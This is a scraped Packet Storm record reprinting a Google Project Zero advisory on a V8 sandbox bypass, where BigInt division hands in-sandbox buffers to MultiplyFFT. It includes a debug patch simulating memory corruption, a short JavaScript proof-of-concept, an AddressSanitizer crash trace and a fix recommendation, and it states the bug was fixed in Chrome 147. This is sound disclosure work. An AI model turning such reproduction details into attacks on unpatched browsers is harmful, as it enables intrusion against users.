{“lastseen”:”2026-04-17T17:14:16″,”description”:”This is a variant of crbug.com\/474041332. The issue there was that MultiplyFFT, an optimized version of integer multiplication for very large inputs, is not robust against concurrent modification of its input buffers, but was called from…”,”published”:”2026-04-17T00:00:00″,”modified”:”2026-04-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 V8 Sandbox Bypass: BigInt Division Memory Corruption”,”source”:””,”references”:””,”id”:”PACKETSTORM:219160″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”Vulnerability Details\\n \\n This is a variant of crbug.com\/474041332. The issue there was that MultiplyFFT, an optimized version of integer multiplication for very large inputs, is not robust against concurrent modification of its input buffers, but was called from ProcessorImpl::FromStringLarge with a temporary buffer inside the sandbox. The fix was to switch the caller to instead supply an out-of-sandbox temporary buffer.\\n \\n However, it seems that there is at least one other function that calls MultiplyFFT with in-sandbox buffers: DivideBurnikelZiegler, used during BigInt division. An excerpt of the function is shown below.\\n \\n void ProcessorImpl::DivideBurnikelZiegler(RWDigits Q, RWDigits R, Digits A,\\n Digits B) {\\n \/\/ Q, A, B are inside the sandbox during BigInt division\\n \/\/ …\\n \\n for (int i = t – 3; i \\u003e= 0; i–) {\\n \/\/ …\\n RWDigits Qi(Q, i * n, n); \/\/ [Inside the sandbox]\\n bz.D2n1n(Qi, Ri, Z, B); \/\/ This will end up calling MultiplyFFT\\n if (should_terminate()) return;\\n }\\n \\n The call to D2n1n will eventually call MultiplyFFT with (a part of) Q as a temporary buffer. As such, the same bug can trigger on this code path.\\n Reproduction\\n \\n Similar to issue 474041332, this bug is somewhat tricky to reproduce purely from JavaScript, but easily reproducible with a custom patch to the MultiplyFFT logic:\\n \\n diff –git a\/BUILD.gn b\/BUILD.gn\\n index 953b81e72da..92103e87b1f 100644\\n — a\/BUILD.gn\\n +++ b\/BUILD.gn\\n @@ -7418,6 +7418,8 @@ v8_source_set(\\”v8_bigint\\”) {\\n }\\n \\n configs = [ \\”:internal_config\\” ]\\n +\\n + deps = [ \\”:v8_abseil\\” ]\\n }\\n \\n v8_header_set(\\”v8_heap_base_headers\\”) {\\n diff –git a\/src\/bigint\/mul-fft.cc b\/src\/bigint\/mul-fft.cc\\n index f1d8bff8496..9840a82a20a 100644\\n — a\/src\/bigint\/mul-fft.cc\\n +++ b\/src\/bigint\/mul-fft.cc\\n @@ -7,10 +7,18 @@\\n \/\/ Christoph L\u00fcders: Fast Multiplication of Large Integers,\\n \/\/ http:\/\/arxiv.org\/abs\/1503.04955\\n \\n +#include \\”src\/sandbox\/sandbox.h\\”\\n +\/\/ Necessary hack to make it compile.\\n +#undef CHECK\\n +#undef DCHECK\\n +#undef USE\\n +\\n #include \\”src\/bigint\/bigint-internal.h\\”\\n #include \\”src\/bigint\/digit-arithmetic.h\\”\\n #include \\”src\/bigint\/util.h\\”\\n \\n +#include \\u003cunistd.h\\u003e\\n +\\n namespace v8 {\\n namespace bigint {\\n \\n @@ -479,6 +487,20 @@ class FFTContainer {\\n \\n inline void CopyAndZeroExtend(digit_t* dst, const digit_t* src,\\n int digits_to_copy, size_t total_bytes) {\\n + \/\/ Simulate concurrent corruption inside the sandbox.\\n + uintptr_t src_addr = reinterpret_cast\\u003cuintptr_t\\u003e(src);\\n + if (internal::InsideSandbox(src_addr)) {\\n + for (int i = 0; i \\u003c digits_to_copy; i++) {\\n + if ((std::rand() % 10) == 0) {\\n + digit_t* writable_src = const_cast\\u003cdigit_t*\\u003e(src);\\n + writable_src[i] = static_cast\\u003cdigit_t\\u003e(-1);\\n + }\\n + }\\n + }\\n +\\n size_t bytes_to_copy = digits_to_copy * sizeof(digit_t);\\n memcpy(dst, static_cast\\u003cconst void*\\u003e(src), bytes_to_copy);\\n memset(dst + digits_to_copy, 0, total_bytes – bytes_to_copy);\\n \\n Then the issue can be observed with a simple testcase such as:\\n \\n const x = 123456n;\\n const a = 31337n ** x;\\n const b = 42n ** x;\\n const c = a \/ b;\\n \\n When run in an ASAN-enabled build:\\n \\n \\u003e cat out\/sbxtst\/args.gn\\n is_debug = false\\n dcheck_always_on = false\\n is_asan = true\\n target_cpu = \\”x64\\”\\n \\n \\u003e .\/out\/x64.sbxtst\/d8 –sandbox-testing poc.js\\n =================================================================\\n ==250549==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ed3b8818800 at pc 0x55ffcb3bacc4 bp 0x7ffff5cbf930 sp 0x7ffff5cbf928\\n WRITE of size 8 at 0x7ed3b8818800 thread T0\\n #0 0x55ffcb3bacc3 in v8::bigint::ProcessorImpl::MultiplyFFT(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src\/bigint\/bigint.h:162:37\\n #1 0x55ffcb3867fb in v8::bigint::ProcessorImpl::Multiply(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src\/bigint\/bigint-internal.cc:49:10\\n #2 0x55ffcb39b74c in v8::bigint::(anonymous namespace)::BZ::D3n2n(v8::bigint::RWDigits, v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits, v8::bigint::Digits) src\/bigint\/div-burnikel.cc:138:10\\n #3 0x55ffcb399d2a in v8::bigint::(anonymous namespace)::BZ::D2n1n(v8::bigint::RWDigits, v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src\/bigint\/div-burnikel.cc:189:3\\n #4 0x55ffcb398c89 in v8::bigint::ProcessorImpl::DivideBurnikelZiegler(v8::bigint::RWDigits, v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src\/bigint\/div-burnikel.cc:262:8\\n #5 0x55ffcb387363 in v8::bigint::ProcessorImpl::Divide(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src\/bigint\/bigint-internal.cc:81:5\\n #6 0x55ffcb388e13 in v8::bigint::Processor::Divide(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src\/bigint\/bigint-internal.cc:138:9\\n #7 0x55ffc8aa7199 in v8::internal::MutableBigInt_AbsoluteDivAndCanonicalize(unsigned long, unsigned long, unsigned long) src\/objects\/bigint.cc:1549:56\\n #8 0x55ffcdfe5724 in Builtins_BigIntDivideNoThrow setup-isolate-deserialize.cc\\n #9 0x55ffce098333 in Builtins_DivHandler setup-isolate-deserialize.cc\\n #10 0x55ffcdee8829 in Builtins_InterpreterEntryTrampoline setup-isolate-deserialize.cc\\n #11 0x55ffcdee55db in Builtins_JSEntryTrampoline setup-isolate-deserialize.cc\\n #12 0x55ffcdee532a in Builtins_JSEntry setup-isolate-deserialize.cc\\n #13 0x55ffc805e1b2 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const\\u0026) src\/execution\/simulator.h:216:12\\n #14 0x55ffc8060ad8 in v8::internal::Execution::CallScript(v8::internal::Isolate*, v8::internal::DirectHandle\\u003cv8::internal::JSFunction\\u003e, v8::internal::DirectHandle\\u003cv8::internal::Object\\u003e, v8::internal::DirectHandle\\u003cv8::internal::Object\\u003e) src\/execution\/execution.cc:542:10\\n #15 0x55ffc7b6336b in v8::Script::Run(v8::Local\\u003cv8::Context\\u003e, v8::Local\\u003cv8::Data\\u003e) src\/api\/api.cc:2015:7\\n #16 0x55ffc77312ee in v8::Shell::ExecuteString(v8::Isolate*, v8::Local\\u003cv8::String\\u003e, v8::Local\\u003cv8::String\\u003e, v8::Shell::ReportExceptions, v8::Global\\u003cv8::Value\\u003e*) src\/d8\/d8.cc:1037:44\\n #17 0x55ffc777990d in v8::SourceGroup::Execute(v8::Isolate*) src\/d8\/d8.cc:5614:10\\n #18 0x55ffc7789403 in v8::Shell::RunMainIsolate(v8::Isolate*, bool) src\/d8\/d8.cc:6633:37\\n #19 0x55ffc7788712 in v8::Shell::RunMain(v8::Isolate*, bool) src\/d8\/d8.cc:6541:18\\n #20 0x55ffc778d709 in v8::Shell::Main(int, char**) src\/d8\/d8.cc:7456:18\\n #21 0x7fc3b967eca7 in __libc_start_call_main csu\/..\/sysdeps\/nptl\/libc_start_call_main.h:58:16\\n \\n 0x7ed3b8818800 is located 0 bytes after 65536-byte region [0x7ed3b8808800,0x7ed3b8818800)\\n allocated by thread T0 here:\\n #0 0x55ffc76f784d in operator new[](unsigned long) (\/usr\/local\/google\/home\/saelo\/Workspace\/v8\/v8\/out\/sbxfuzz\/d8+0x24a984d) (BuildId: e754bcc7c236b531)\\n #1 0x55ffcb396fc6 in v8::bigint::ProcessorImpl::DivideBurnikelZiegler(v8::bigint::RWDigits, v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src\/bigint\/bigint-internal.h:140:43\\n #2 0x55ffcb387363 in v8::bigint::ProcessorImpl::Divide(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src\/bigint\/bigint-internal.cc:81:5\\n #3 0x55ffcb388e13 in v8::bigint::Processor::Divide(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits) src\/bigint\/bigint-internal.cc:138:9\\n #4 0x55ffc8aa7199 in v8::internal::MutableBigInt_AbsoluteDivAndCanonicalize(unsigned long, unsigned long, unsigned long) src\/objects\/bigint.cc:1549:56\\n #5 0x55ffcdfe5724 in Builtins_BigIntDivideNoThrow setup-isolate-deserialize.cc\\n #6 0x55ffce098333 in Builtins_DivHandler setup-isolate-deserialize.cc\\n #7 0x55ffcdee8829 in Builtins_InterpreterEntryTrampoline setup-isolate-deserialize.cc\\n #8 0x55ffcdee55db in Builtins_JSEntryTrampoline setup-isolate-deserialize.cc\\n #9 0x55ffcdee532a in Builtins_JSEntry setup-isolate-deserialize.cc\\n #10 0x55ffc805e1b2 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const\\u0026) src\/execution\/simulator.h:216:12\\n #11 0x55ffc8060ad8 in v8::internal::Execution::CallScript(v8::internal::Isolate*, v8::internal::DirectHandle\\u003cv8::internal::JSFunction\\u003e, v8::internal::DirectHandle\\u003cv8::internal::Object\\u003e, v8::internal::DirectHandle\\u003cv8::internal::Object\\u003e) src\/execution\/execution.cc:542:10\\n #12 0x55ffc7b6336b in v8::Script::Run(v8::Local\\u003cv8::Context\\u003e, v8::Local\\u003cv8::Data\\u003e) src\/api\/api.cc:2015:7\\n #13 0x55ffc77312ee in v8::Shell::ExecuteString(v8::Isolate*, v8::Local\\u003cv8::String\\u003e, v8::Local\\u003cv8::String\\u003e, v8::Shell::ReportExceptions, v8::Global\\u003cv8::Value\\u003e*) src\/d8\/d8.cc:1037:44\\n #14 0x55ffc777990d in v8::SourceGroup::Execute(v8::Isolate*) src\/d8\/d8.cc:5614:10\\n #15 0x55ffc7789403 in v8::Shell::RunMainIsolate(v8::Isolate*, bool) src\/d8\/d8.cc:6633:37\\n #16 0x55ffc7788712 in v8::Shell::RunMain(v8::Isolate*, bool) src\/d8\/d8.cc:6541:18\\n #17 0x55ffc778d709 in v8::Shell::Main(int, char**) src\/d8\/d8.cc:7456:18\\n #18 0x7fc3b967eca7 in __libc_start_call_main csu\/..\/sysdeps\/nptl\/libc_start_call_main.h:58:16\\n \\n SUMMARY: AddressSanitizer: heap-buffer-overflow src\/bigint\/bigint.h:162:37 in v8::bigint::ProcessorImpl::MultiplyFFT(v8::bigint::RWDigits, v8::bigint::Digits, v8::bigint::Digits)\\n Shadow bytes around the buggy address:\\n 0x7ed3b8818580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\\n 0x7ed3b8818600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\\n 0x7ed3b8818680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\\n 0x7ed3b8818700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\\n 0x7ed3b8818780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\\n =\\u003e0x7ed3b8818800:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\n 0x7ed3b8818880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\n 0x7ed3b8818900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\n 0x7ed3b8818980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\n 0x7ed3b8818a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\n 0x7ed3b8818a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\\n Shadow byte legend (one shadow byte represents 8 application bytes):\\n Addressable: 00\\n Partially addressable: 01 02 03 04 05 06 07\\n Heap left redzone: fa\\n Freed heap region: fd\\n Stack left redzone: f1\\n Stack mid redzone: f2\\n Stack right redzone: f3\\n Stack after return: f5\\n Stack use after scope: f8\\n Global redzone: f9\\n Global init order: f6\\n Poisoned by user: f7\\n Container overflow: fc\\n Array cookie: ac\\n Intra object redzone: bb\\n ASan internal: fe\\n Left alloca redzone: ca\\n Right alloca redzone: cb\\n ==250549==ABORTING\\n \\n ## V8 sandbox violation detected!\\n \\n Fix Recommendation\\n \\n As an initial spot fix it may again be possible to use a different out-of-sandbox temporary buffer. However, the BigInt parsing logic has historically been somewhat fragile when exposed to in-sandbox corruption (see the other sandbox-related CHECKs in src\/bigint). As such, for a more thorough fix I would recommend refactoring the code to avoid operating on both in-sandbox and out-of-sandbox memory at the same time, ideally by moving all dynamic memory allocations performed by this code into the sandbox. Afterwards, similar bugs would only lead to further in-sandbox corruption and the BigInt logic would therefore effectively behave like sandboxed code (not writing to out-of-sandbox memory).\\n Credit Information\\n \\n Samuel Gro\u00df of Google Project Zero\\n \\n Disclosure Deadline\\n \\n This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2026-04-26.\\n \\n For more details, see the Project Zero vulnerability disclosure policy: https:\/\/googleprojectzero.blogspot.com\/p\/vulnerability-disclosure-policy.html\\n \\n \\n Issue summary\\n \\n This is a variant of crbug.com\/474041332 . The issue there was that MultiplyFFT, an optimized version of integer multiplication for very large inputs, is not robust against concurrent modification of its input buffers, but was called from ProcessorImpl::FromStringLarge with a temporary buffer inside the sandbox. The fix was to switch the caller to instead supply an out-of-sandbox temporary buffer. \\n \\n For more details, see the Project Zero vulnerability disclosure policy:\\n https:\/\/googleprojectzero.blogspot.com\/p\/vulnerability-disclosure-policy.html\\n \\n https:\/\/crbug.com\/478814654\\n \\n This was fixed with https:\/\/crrev.com\/c\/7581282 which first shipped in Chrome 147.0.7727.24 (Stable channel).\\n \\n \\n \\n Credit: saelo”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219160″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219160\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-17T17:14:16″,”description”:”This is a variant of crbug.com\/474041332. The issue there was that MultiplyFFT, an optimized version of integer multiplication for very large inputs, is not robust…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-47682","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n